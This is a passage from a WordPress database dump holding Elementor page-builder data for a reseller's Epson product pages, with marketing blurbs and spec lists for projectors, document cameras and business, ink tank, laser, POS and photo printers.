]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3981,2756,'_elementor_version','0.4'),(3991,2758,'_wp_page_template','template-fullwidth.php'),(3992,2758,'_elementor_edit_mode','builder'),(3993,2758,'_elementor_template_type','post'),(3994,2758,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-100\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 